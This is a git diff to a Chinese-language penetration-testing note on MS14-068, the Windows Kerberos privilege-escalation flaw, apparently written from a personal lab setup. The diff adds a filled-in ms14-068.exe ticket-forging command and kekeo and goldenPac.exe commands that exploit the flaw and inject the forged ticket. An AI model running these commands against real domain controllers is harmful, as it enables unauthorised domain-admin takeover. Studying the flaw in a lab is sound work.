--- a/Penetration/域相关/MS14-068/MS14-068.md
+++ b/Penetration/域相关/MS14-068/MS14-068.md
@@ -55,9 +55,10 @@ S-1-5-21-3014572423-1275547571-3261963242-1106	域用户test的
 
 ```
 ms14-068.exe -u 域成员名@域名 -s sid -d 域控制器地址 -p 域成员密码
+ms14-068.exe -u test@town.domain -s S-1-5-21-3014572423-1275547571-3261963242-1106 -d 192.168.1.10 -p
 ```
 
-![image-20231201155247787](images/7.png)
+![image-20231205205717345](images/7.png)
 
 可以看到生成了票据`TGT_test@town.domain.ccache`
 
@@ -84,6 +85,12 @@ kerberos::ptc TGT_test@town.domain.ccache
 ```
 
 这里可能是我版本的问题没有打通
+
+```
+kekeo.exe "exploit::ms14068 /user:win10test /password:密码 /domain:town.domain /ptt" exit
+
+goldenPac.exe town.domain/win10test:密码@dc.town.domain
+```
 
 
 
